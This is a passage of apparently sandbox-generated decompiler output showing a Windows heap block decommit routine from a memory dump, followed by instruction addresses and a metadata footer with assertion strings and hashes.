                                                                                                            						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                                                                                            						_t256 =  *(_t452 + 0x14);
                                                                                                            						__eflags = _t256 - 0x7f000;
                                                                                                            						if(_t256 >= 0x7f000) {
                                                                                                            							_t142 = _t553 + 0x1ec;
                                                                                                            							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                                                                                            							__eflags =  *_t142;
                                                                                                            							_t256 =  *(_t452 + 0x14);
                                                                                                            						}
                                                                                                            						_t513 = _v48;
                                                                                                            						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                                                                                            						_a4 = _t445;
                                                                                                            						_v40 = 1;
                                                                                                            					} else {
                                                                                                            						_t27 =  &_v36;
                                                                                                            						 *_t27 = _v36 & 0x00000000;
                                                                                                            						__eflags =  *_t27;
                                                                                                            					}
                                                                                                            					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                                                                                            					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                                                                                            						_v44 = _t513;
                                                                                                            						_t262 = E0106A9EF(_t541, _t513);
                                                                                                            						__eflags = _a8;
                                                                                                            						_v32 = _t262;
                                                                                                            						if(_a8 != 0) {
                                                                                                            							__eflags = _t262;
                                                                                                            							if(_t262 == 0) {
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						__eflags =  *0x1158748 - 1;
                                                                                                            						if( *0x1158748 >= 1) {
                                                                                                            							__eflags = _t262;
                                                                                                            							if(_t262 == 0) {
                                                                                                            								_t415 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t415 + 0xc);
                                                                                                            								if( *(_t415 + 0xc) == 0) {
                                                                                                            									_push("HEAP: ");
                                                                                                            									E0106B150();
                                                                                                            								} else {
                                                                                                            									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            								}
                                                                                                            								_push("(UCRBlock != NULL)");
                                                                                                            								E0106B150();
                                                                                                            								__eflags =  *0x1157bc8;
                                                                                                            								if( *0x1157bc8 == 0) {
                                                                                                            									__eflags = 1;
                                                                                                            									E01122073(_t445, 1, _t541, 1);
                                                                                                            								}
                                                                                                            								_t513 = _v48;
                                                                                                            								_t445 = _a4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t350 = _v40;
                                                                                                            						_t480 = _t445 << 3;
                                                                                                            						_v20 = _t480;
                                                                                                            						_t481 = _t480 + _t513;
                                                                                                            						_v24 = _t481;
                                                                                                            						__eflags = _t350;
                                                                                                            						if(_t350 == 0) {
                                                                                                            							_t481 = _t481 + 0xfffffff0;
                                                                                                            							__eflags = _t481;
                                                                                                            						}
                                                                                                            						_t483 = (_t481 & 0xfffff000) - _v44;
                                                                                                            						__eflags = _t483;
                                                                                                            						_v52 = _t483;
                                                                                                            						if(_t483 == 0) {
                                                                                                            							__eflags =  *0x1158748 - 1;
                                                                                                            							if( *0x1158748 < 1) {
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            							__eflags = _t350;
                                                                                                            							goto L146;
                                                                                                            						} else {
                                                                                                            							_t352 = E0109174B( &_v44,  &_v52, 0x4000);
                                                                                                            							__eflags = _t352;
                                                                                                            							if(_t352 < 0) {
                                                                                                            								goto L94;
                                                                                                            							}
                                                                                                            							_t353 = E01087D50();
                                                                                                            							_t447 = 0x7ffe0380;
                                                                                                            							__eflags = _t353;
                                                                                                            							if(_t353 != 0) {
                                                                                                            								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            							} else {
                                                                                                            								_t356 = 0x7ffe0380;
                                                                                                            							}
                                                                                                            							__eflags =  *_t356;
                                                                                                            							if( *_t356 != 0) {
                                                                                                            								_t357 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                                                                                            								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                                                                                            									E011214FB(_t447, _t553, _v44, _v52, 5);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t358 = _v32;
                                                                                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                                                            							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                                                                                            							__eflags = _t484 - 0x7f000;
                                                                                                            							if(_t484 >= 0x7f000) {
                                                                                                            								_t90 = _t553 + 0x1ec;
                                                                                                            								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                                                                                            								__eflags =  *_t90;
                                                                                                            							}
                                                                                                            							E01069373(_t553, _t358);
                                                                                                            							_t486 = _v32;
                                                                                                            							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                                                                                            							E01069819(_t486);
                                                                                                            							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                                                                                            							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                                                                                            							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                                                                                            							__eflags = _t366 - 0x7f000;
                                                                                                            							if(_t366 >= 0x7f000) {
                                                                                                            								_t104 = _t553 + 0x1ec;
                                                                                                            								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                                                                                            								__eflags =  *_t104;
                                                                                                            							}
                                                                                                            							__eflags = _v40;
                                                                                                            							if(_v40 == 0) {
                                                                                                            								_t533 = _v52 + _v44;
                                                                                                            								_v32 = _t533;
                                                                                                            								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                                                            								__eflags = _v24 - _v52 + _v44;
                                                                                                            								if(_v24 == _v52 + _v44) {
                                                                                                            									__eflags =  *(_t553 + 0x4c);
                                                                                                            									if( *(_t553 + 0x4c) != 0) {
                                                                                                            										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                                                                                            										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t449 = 0;
                                                                                                            									_t533[3] = 0;
                                                                                                            									_t533[1] = 0;
                                                                                                            									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                                                                                            									_t491 = _t394;
                                                                                                            									 *_t533 = _t394;
                                                                                                            									__eflags =  *0x1158748 - 1; // 0x0
                                                                                                            									if(__eflags >= 0) {
                                                                                                            										__eflags = _t491 - 1;
                                                                                                            										if(_t491 <= 1) {
                                                                                                            											_t404 =  *[fs:0x30];
                                                                                                            											__eflags =  *(_t404 + 0xc);
                                                                                                            											if( *(_t404 + 0xc) == 0) {
                                                                                                            												_push("HEAP: ");
                                                                                                            												E0106B150();
                                                                                                            											} else {
                                                                                                            												E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            											}
                                                                                                            											_push("((LONG)FreeEntry->Size > 1)");
                                                                                                            											E0106B150();
                                                                                                            											_pop(_t491);
                                                                                                            											__eflags =  *0x1157bc8 - _t449; // 0x0
                                                                                                            											if(__eflags == 0) {
                                                                                                            												__eflags = 0;
                                                                                                            												_t491 = 1;
                                                                                                            												E01122073(_t449, 1, _t541, 0);
                                                                                                            											}
                                                                                                            											_t533 = _v32;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t533[1] = _t449;
                                                                                                            									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                                                            									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                                                                                            										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                                                                                            										_v16 = _t402;
                                                                                                            										__eflags = _t402 - 0xfe;
                                                                                                            										if(_t402 >= 0xfe) {
                                                                                                            											_push(_t491);
                                                                                                            											_push(_t449);
                                                                                                            											E0112A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                                                                                            											_t533 = _v48;
                                                                                                            											_t402 = _v32;
                                                                                                            										}
                                                                                                            										_t449 = _t402;
                                                                                                            									}
                                                                                                            									_t533[3] = _t449;
                                                                                                            									E0108A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                                                                                            									_t447 = 0x7ffe0380;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t367 = E01087D50();
                                                                                                            							__eflags = _t367;
                                                                                                            							if(_t367 != 0) {
                                                                                                            								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            							} else {
                                                                                                            								_t370 = _t447;
                                                                                                            							}
                                                                                                            							__eflags =  *_t370;
                                                                                                            							if( *_t370 != 0) {
                                                                                                            								_t371 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t371 + 0x240) & 1;
                                                                                                            								if(( *(_t371 + 0x240) & 1) != 0) {
                                                                                                            									__eflags = E01087D50();
                                                                                                            									if(__eflags != 0) {
                                                                                                            										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            									}
                                                                                                            									E01121411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t372 = E01087D50();
                                                                                                            							_t546 = 0x7ffe038a;
                                                                                                            							_t446 = 0x230;
                                                                                                            							__eflags = _t372;
                                                                                                            							if(_t372 != 0) {
                                                                                                            								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                            							} else {
                                                                                                            								_t246 = 0x7ffe038a;
                                                                                                            							}
                                                                                                            							__eflags =  *_t246;
                                                                                                            							if( *_t246 == 0) {
                                                                                                            								goto L7;
                                                                                                            							} else {
                                                                                                            								__eflags = E01087D50();
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                                                                                            									__eflags = _t546;
                                                                                                            								}
                                                                                                            								_push( *_t546 & 0x000000ff);
                                                                                                            								_push(_v36);
                                                                                                            								_push(_v40);
                                                                                                            								goto L120;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						L19:
                                                                                                            						_t31 = _t513 + 0x101f; // 0x101f
                                                                                                            						_t455 = _t31 & 0xfffff000;
                                                                                                            						_t32 = _t513 + 0x28; // 0x28
                                                                                                            						_v44 = _t455;
                                                                                                            						__eflags = _t455 - _t32;
                                                                                                            						if(_t455 == _t32) {
                                                                                                            							_t455 = _t455 + 0x1000;
                                                                                                            							_v44 = _t455;
                                                                                                            						}
                                                                                                            						_t265 = _t445 << 3;
                                                                                                            						_v24 = _t265;
                                                                                                            						_t266 = _t265 + _t513;
                                                                                                            						__eflags = _v40;
                                                                                                            						_v20 = _t266;
                                                                                                            						if(_v40 == 0) {
                                                                                                            							_t266 = _t266 + 0xfffffff0;
                                                                                                            							__eflags = _t266;
                                                                                                            						}
                                                                                                            						_t267 = _t266 & 0xfffff000;
                                                                                                            						_v52 = _t267;
                                                                                                            						__eflags = _t267 - _t455;
                                                                                                            						if(_t267 < _t455) {
                                                                                                            							__eflags =  *0x1158748 - 1; // 0x0
                                                                                                            							if(__eflags < 0) {
                                                                                                            								L9:
                                                                                                            								_t450 = _t553;
                                                                                                            								L10:
                                                                                                            								_push(_t445);
                                                                                                            								goto L11;
                                                                                                            							}
                                                                                                            							__eflags = _v40;
                                                                                                            							L146:
                                                                                                            							if(__eflags == 0) {
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            							_t270 =  *[fs:0x30];
                                                                                                            							__eflags =  *(_t270 + 0xc);
                                                                                                            							if( *(_t270 + 0xc) == 0) {
                                                                                                            								_push("HEAP: ");
                                                                                                            								E0106B150();
                                                                                                            							} else {
                                                                                                            								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            							}
                                                                                                            							_push("(!TrailingUCR)");
                                                                                                            							E0106B150();
                                                                                                            							__eflags =  *0x1157bc8;
                                                                                                            							if( *0x1157bc8 == 0) {
                                                                                                            								__eflags = 0;
                                                                                                            								E01122073(_t445, 1, _t541, 0);
                                                                                                            							}
                                                                                                            							L152:
                                                                                                            							_t445 = _a4;
                                                                                                            							L153:
                                                                                                            							_t513 = _v48;
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						_v32 = _t267;
                                                                                                            						_t280 = _t267 - _t455;
                                                                                                            						_v32 = _v32 - _t455;
                                                                                                            						__eflags = _a8;
                                                                                                            						_t460 = _v32;
                                                                                                            						_v52 = _t460;
                                                                                                            						if(_a8 != 0) {
                                                                                                            							L27:
                                                                                                            							__eflags = _t280;
                                                                                                            							if(_t280 == 0) {
                                                                                                            								L33:
                                                                                                            								_t446 = 0;
                                                                                                            								__eflags = _v40;
                                                                                                            								if(_v40 == 0) {
                                                                                                            									_t468 = _v44 + _v52;
                                                                                                            									_v36 = _t468;
                                                                                                            									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                                                            									__eflags = _v20 - _v52 + _v44;
                                                                                                            									if(_v20 == _v52 + _v44) {
                                                                                                            										__eflags =  *(_t553 + 0x4c);
                                                                                                            										if( *(_t553 + 0x4c) != 0) {
                                                                                                            											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                                                                                            											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t468[3] = 0;
                                                                                                            										_t468[1] = 0;
                                                                                                            										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                                                                                            										_t521 = _t317;
                                                                                                            										 *_t468 = _t317;
                                                                                                            										__eflags =  *0x1158748 - 1; // 0x0
                                                                                                            										if(__eflags >= 0) {
                                                                                                            											__eflags = _t521 - 1;
                                                                                                            											if(_t521 <= 1) {
                                                                                                            												_t327 =  *[fs:0x30];
                                                                                                            												__eflags =  *(_t327 + 0xc);
                                                                                                            												if( *(_t327 + 0xc) == 0) {
                                                                                                            													_push("HEAP: ");
                                                                                                            													E0106B150();
                                                                                                            												} else {
                                                                                                            													E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            												}
                                                                                                            												_push("(LONG)FreeEntry->Size > 1");
                                                                                                            												E0106B150();
                                                                                                            												__eflags =  *0x1157bc8 - _t446; // 0x0
                                                                                                            												if(__eflags == 0) {
                                                                                                            													__eflags = 1;
                                                                                                            													E01122073(_t446, 1, _t541, 1);
                                                                                                            												}
                                                                                                            												_t468 = _v36;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										_t468[1] = _t446;
                                                                                                            										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                                                                                            										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                                                            										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                                                                                            											_t320 = _t446;
                                                                                                            										} else {
                                                                                                            											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                                                                                            											_v12 = _t320;
                                                                                                            											__eflags = _t320 - 0xfe;
                                                                                                            											if(_t320 >= 0xfe) {
                                                                                                            												_push(_t468);
                                                                                                            												_push(_t446);
                                                                                                            												E0112A80D(_t522, 3, _t468, _t541);
                                                                                                            												_t468 = _v52;
                                                                                                            												_t320 = _v28;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										_t468[3] = _t320;
                                                                                                            										E0108A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								E0108B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                                                                                            								E0108A830(_t553, _v64, _v24);
                                                                                                            								_t286 = E01087D50();
                                                                                                            								_t542 = 0x7ffe0380;
                                                                                                            								__eflags = _t286;
                                                                                                            								if(_t286 != 0) {
                                                                                                            									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            								} else {
                                                                                                            									_t289 = 0x7ffe0380;
                                                                                                            								}
                                                                                                            								__eflags =  *_t289;
                                                                                                            								if( *_t289 != 0) {
                                                                                                            									_t290 =  *[fs:0x30];
                                                                                                            									__eflags =  *(_t290 + 0x240) & 1;
                                                                                                            									if(( *(_t290 + 0x240) & 1) != 0) {
                                                                                                            										__eflags = E01087D50();
                                                                                                            										if(__eflags != 0) {
                                                                                                            											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            										}
                                                                                                            										E01121411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t291 = E01087D50();
                                                                                                            								_t543 = 0x7ffe038a;
                                                                                                            								__eflags = _t291;
                                                                                                            								if(_t291 != 0) {
                                                                                                            									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                            								} else {
                                                                                                            									_t246 = 0x7ffe038a;
                                                                                                            								}
                                                                                                            								__eflags =  *_t246;
                                                                                                            								if( *_t246 != 0) {
                                                                                                            									__eflags = E01087D50();
                                                                                                            									if(__eflags != 0) {
                                                                                                            										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                            										__eflags = _t543;
                                                                                                            									}
                                                                                                            									_push( *_t543 & 0x000000ff);
                                                                                                            									_push(_t446);
                                                                                                            									_push(_t446);
                                                                                                            									L120:
                                                                                                            									_push( *(_t553 + 0x74) << 3);
                                                                                                            									_push(_v52);
                                                                                                            									_t246 = E01121411(_t446, _t553, _v44, __eflags);
                                                                                                            								}
                                                                                                            								goto L7;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                                                            							_t339 = E0109174B( &_v44,  &_v52, 0x4000);
                                                                                                            							__eflags = _t339;
                                                                                                            							if(_t339 < 0) {
                                                                                                            								L94:
                                                                                                            								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                                                                                            								__eflags = _v40;
                                                                                                            								if(_v40 == 0) {
                                                                                                            									goto L153;
                                                                                                            								}
                                                                                                            								E0108B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                                                                                            								goto L152;
                                                                                                            							}
                                                                                                            							_t344 = E01087D50();
                                                                                                            							__eflags = _t344;
                                                                                                            							if(_t344 != 0) {
                                                                                                            								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            							} else {
                                                                                                            								_t347 = 0x7ffe0380;
                                                                                                            							}
                                                                                                            							__eflags =  *_t347;
                                                                                                            							if( *_t347 != 0) {
                                                                                                            								_t348 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t348 + 0x240) & 1;
                                                                                                            								if(( *(_t348 + 0x240) & 1) != 0) {
                                                                                                            									E011214FB(_t445, _t553, _v44, _v52, 6);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t513 = _v48;
                                                                                                            							goto L33;
                                                                                                            						}
                                                                                                            						__eflags =  *_v12 - 3;
                                                                                                            						_t513 = _v48;
                                                                                                            						if( *_v12 == 3) {
                                                                                                            							goto L27;
                                                                                                            						}
                                                                                                            						__eflags = _t460;
                                                                                                            						if(_t460 == 0) {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                                                                                            						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t445 = _a4;
                                                                                                            				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                                                                                            					_t513 = __edx;
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                                                                                            				_v20 = _t433;
                                                                                                            				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                                                                                            					_t513 = _t539;
                                                                                                            					goto L9;
                                                                                                            				} else {
                                                                                                            					_t437 = E010899BF(__ecx, __edx,  &_a4, 0);
                                                                                                            					_t445 = _a4;
                                                                                                            					_t514 = _t437;
                                                                                                            					_v56 = _t514;
                                                                                                            					if(_t445 - 0x201 > 0xfbff) {
                                                                                                            						goto L14;
                                                                                                            					} else {
                                                                                                            						E0108A830(__ecx, _t514, _t445);
                                                                                                            						_t506 =  *(_t553 + 0x238);
                                                                                                            						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                                                                                            						_t246 = _t506 >> 4;
                                                                                                            						if(_t551 < _t506 - _t246) {
                                                                                                            							_t508 =  *(_t553 + 0x23c);
                                                                                                            							_t246 = _t508 >> 2;
                                                                                                            							__eflags = _t551 - _t508 - _t246;
                                                                                                            							if(_t551 > _t508 - _t246) {
                                                                                                            								_t246 = E0109ABD8(_t553);
                                                                                                            								 *(_t553 + 0x23c) = _t551;
                                                                                                            								 *(_t553 + 0x238) = _t551;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}



















































































                                                                                                            0x010d1f7e
                                                                                                            0x010d1f83
                                                                                                            0x010d1f61
                                                                                                            0x010d1f76
                                                                                                            0x010d1f7b
                                                                                                            0x010d1f89
                                                                                                            0x010d1f8e
                                                                                                            0x010d1f93
                                                                                                            0x010d1f94
                                                                                                            0x010d1f9a
                                                                                                            0x010d1f9c
                                                                                                            0x010d1f9e
                                                                                                            0x010d1fa1
                                                                                                            0x010d1fa1
                                                                                                            0x010d1fa6
                                                                                                            0x010d1fa6
                                                                                                            0x010d1f50
                                                                                                            0x0108a74e
                                                                                                            0x0108a751
                                                                                                            0x0108a754
                                                                                                            0x0108a75d
                                                                                                            0x0108a75e
                                                                                                            0x0108a762
                                                                                                            0x0108a767
                                                                                                            0x010d1faf
                                                                                                            0x010d1fb0
                                                                                                            0x010d1fb9
                                                                                                            0x010d1fbe
                                                                                                            0x010d1fc2
                                                                                                            0x010d1fc2
                                                                                                            0x0108a76d
                                                                                                            0x0108a76d
                                                                                                            0x0108a775
                                                                                                            0x0108a778
                                                                                                            0x0108a77d
                                                                                                            0x0108a77d
                                                                                                            0x0108a71e
                                                                                                            0x0108a782
                                                                                                            0x0108a787
                                                                                                            0x0108a789
                                                                                                            0x010d1ff3
                                                                                                            0x0108a78f
                                                                                                            0x0108a78f
                                                                                                            0x0108a78f
                                                                                                            0x0108a791
                                                                                                            0x0108a794
                                                                                                            0x010d1ffd
                                                                                                            0x010d2006
                                                                                                            0x010d200c
                                                                                                            0x010d2017
                                                                                                            0x010d2019
                                                                                                            0x010d2024
                                                                                                            0x010d2024
                                                                                                            0x010d2024
                                                                                                            0x010d2047
                                                                                                            0x010d2047
                                                                                                            0x010d200c
                                                                                                            0x0108a79a
                                                                                                            0x0108a79f
                                                                                                            0x0108a7a4
                                                                                                            0x0108a7a9
                                                                                                            0x0108a7ab
                                                                                                            0x010d205a
                                                                                                            0x0108a7b1
                                                                                                            0x0108a7b1
                                                                                                            0x0108a7b1
                                                                                                            0x0108a7b3
                                                                                                            0x0108a7b6
                                                                                                            0x00000000
                                                                                                            0x0108a7bc
                                                                                                            0x010d2066
                                                                                                            0x010d2068
                                                                                                            0x010d2073
                                                                                                            0x010d2073
                                                                                                            0x010d2073
                                                                                                            0x010d2078
                                                                                                            0x010d2079
                                                                                                            0x010d207d
                                                                                                            0x00000000
                                                                                                            0x010d207d
                                                                                                            0x0108a7b6
                                                                                                            0x0108a440
                                                                                                            0x0108a440
                                                                                                            0x0108a440
                                                                                                            0x0108a446
                                                                                                            0x0108a44c
                                                                                                            0x0108a44f
                                                                                                            0x0108a453
                                                                                                            0x0108a455
                                                                                                            0x010d20b3
                                                                                                            0x010d20b9
                                                                                                            0x010d20b9
                                                                                                            0x0108a45d
                                                                                                            0x0108a460
                                                                                                            0x0108a464
                                                                                                            0x0108a466
                                                                                                            0x0108a46b
                                                                                                            0x0108a46f
                                                                                                            0x0108a471
                                                                                                            0x0108a471
                                                                                                            0x0108a471
                                                                                                            0x0108a474
                                                                                                            0x0108a479
                                                                                                            0x0108a47d
                                                                                                            0x0108a47f
                                                                                                            0x010d2229
                                                                                                            0x010d222f
                                                                                                            0x0108a3c8
                                                                                                            0x0108a3c8
                                                                                                            0x0108a3ca
                                                                                                            0x0108a3ca
                                                                                                            0x00000000
                                                                                                            0x0108a3ca
                                                                                                            0x010d2235
                                                                                                            0x010d223a
                                                                                                            0x010d223a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2240
                                                                                                            0x010d2246
                                                                                                            0x010d224a
                                                                                                            0x010d2269
                                                                                                            0x010d226e
                                                                                                            0x010d224c
                                                                                                            0x010d2261
                                                                                                            0x010d2266
                                                                                                            0x010d2274
                                                                                                            0x010d2279
                                                                                                            0x010d227e
                                                                                                            0x010d2286
                                                                                                            0x010d2288
                                                                                                            0x010d228d
                                                                                                            0x010d228d
                                                                                                            0x010d2292
                                                                                                            0x010d2292
                                                                                                            0x010d2295
                                                                                                            0x010d2295
                                                                                                            0x00000000
                                                                                                            0x010d2295
                                                                                                            0x0108a485
                                                                                                            0x0108a489
                                                                                                            0x0108a48b
                                                                                                            0x0108a48f
                                                                                                            0x0108a493
                                                                                                            0x0108a497
                                                                                                            0x0108a49b
                                                                                                            0x0108a4bb
                                                                                                            0x0108a4bb
                                                                                                            0x0108a4bd
                                                                                                            0x0108a4ff
                                                                                                            0x0108a4ff
                                                                                                            0x0108a501
                                                                                                            0x0108a505
                                                                                                            0x0108a50f
                                                                                                            0x0108a517
                                                                                                            0x0108a51b
                                                                                                            0x0108a527
                                                                                                            0x0108a52b
                                                                                                            0x010d2182
                                                                                                            0x010d2185
                                                                                                            0x010d2193
                                                                                                            0x010d2199
                                                                                                            0x010d2199
                                                                                                            0x0108a531
                                                                                                            0x0108a535
                                                                                                            0x0108a538
                                                                                                            0x0108a548
                                                                                                            0x0108a54b
                                                                                                            0x0108a54d
                                                                                                            0x0108a553
                                                                                                            0x0108a559
                                                                                                            0x010d2100
                                                                                                            0x010d2103
                                                                                                            0x010d2109
                                                                                                            0x010d210f
                                                                                                            0x010d2112
                                                                                                            0x010d2131
                                                                                                            0x010d2136
                                                                                                            0x010d2114
                                                                                                            0x010d2129
                                                                                                            0x010d212e
                                                                                                            0x010d213c
                                                                                                            0x010d2141
                                                                                                            0x010d2147
                                                                                                            0x010d214d
                                                                                                            0x010d2151
                                                                                                            0x010d2154
                                                                                                            0x010d2154
                                                                                                            0x010d2159
                                                                                                            0x010d2159
                                                                                                            0x010d2103
                                                                                                            0x0108a55f
                                                                                                            0x0108a562
                                                                                                            0x0108a565
                                                                                                            0x0108a567
                                                                                                            0x010d2162
                                                                                                            0x0108a56d
                                                                                                            0x0108a574
                                                                                                            0x0108a575
                                                                                                            0x0108a579
                                                                                                            0x0108a57e
                                                                                                            0x010d2169
                                                                                                            0x010d216a
                                                                                                            0x010d2170
                                                                                                            0x010d2175
                                                                                                            0x010d2179
                                                                                                            0x010d2179
                                                                                                            0x0108a57e
                                                                                                            0x0108a584
                                                                                                            0x0108a58f
                                                                                                            0x0108a58f
                                                                                                            0x0108a52b
                                                                                                            0x0108a5ad
                                                                                                            0x0108a5bc
                                                                                                            0x0108a5c1
                                                                                                            0x0108a5c6
                                                                                                            0x0108a5cb
                                                                                                            0x0108a5cd
                                                                                                            0x010d21a9
                                                                                                            0x0108a5d3
                                                                                                            0x0108a5d3
                                                                                                            0x0108a5d3
                                                                                                            0x0108a5d5
                                                                                                            0x0108a5d8
                                                                                                            0x010d21b3
                                                                                                            0x010d21bc
                                                                                                            0x010d21c2
                                                                                                            0x010d21cd
                                                                                                            0x010d21cf
                                                                                                            0x010d21da
                                                                                                            0x010d21da
                                                                                                            0x010d21da
                                                                                                            0x010d21f7
                                                                                                            0x010d21f7
                                                                                                            0x010d21c2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                            • API String ID: 0-523794902
                                                                                                            • Opcode ID: db387a08ec6deb9a294e1258a6c79da5e3f78c16474b15ab2e5853ee7bdd3306
                                                                                                            • Instruction ID: 07115e80d5c145b8319b4e86465eccc37572c7d72d4bcd7216bbcd8210e2275b
                                                                                                            • Opcode Fuzzy Hash: db387a08ec6deb9a294e1258a6c79da5e3f78c16474b15ab2e5853ee7bdd3306
